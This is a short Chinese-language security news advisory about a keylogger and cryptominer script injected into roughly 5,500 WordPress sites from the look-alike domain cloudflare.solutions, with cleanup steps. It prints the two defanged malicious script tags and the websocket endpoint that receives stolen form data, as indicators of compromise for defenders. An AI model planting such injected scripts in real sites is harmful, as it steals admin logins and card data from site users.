据最新消息，约有5500 个 WordPress 网站被发现感染了一个记录键盘点击的恶意脚本，有时候还会加载运行在浏览器上的挖矿程序。

此恶意脚本加载自域名 “cloudflare.solutions”，但该域名与云计算服务商 Cloudflare 无关，只要用户从输入字段切换，就会记录用户在表单字段中输入的内容。

该脚本同时加载到网站的前端和后端，这就意味着它能用于窃取管理员登录凭证和 WP 电子商务网站的信用卡数据。

根据网站源代码搜索引擎 PublicWWW，有 5496 个 WordPress 网站运行了该按键记录程序，而且攻击者从四月份就开始了。

已知加载键盘记录的两个恶意脚本：

< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js' >< /script >

< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js' >< /script >

被盗数据被发送到 wss://cloudflare[.]solutions:8085端口。

如恶意代码驻留在function.php文件中，你应该删除add_js_scripts函数和所有提到add_js_scripts的add_action语句。考虑到这个恶意软件的键盘记录功能，你应该考虑所有的WordPress密码都被破坏了，所以下一个步骤是修改密码，此外别忘了检查你的网站是否有其他感染。

来源：卢松松博客，欢迎分享，（QQ/微信：13340454）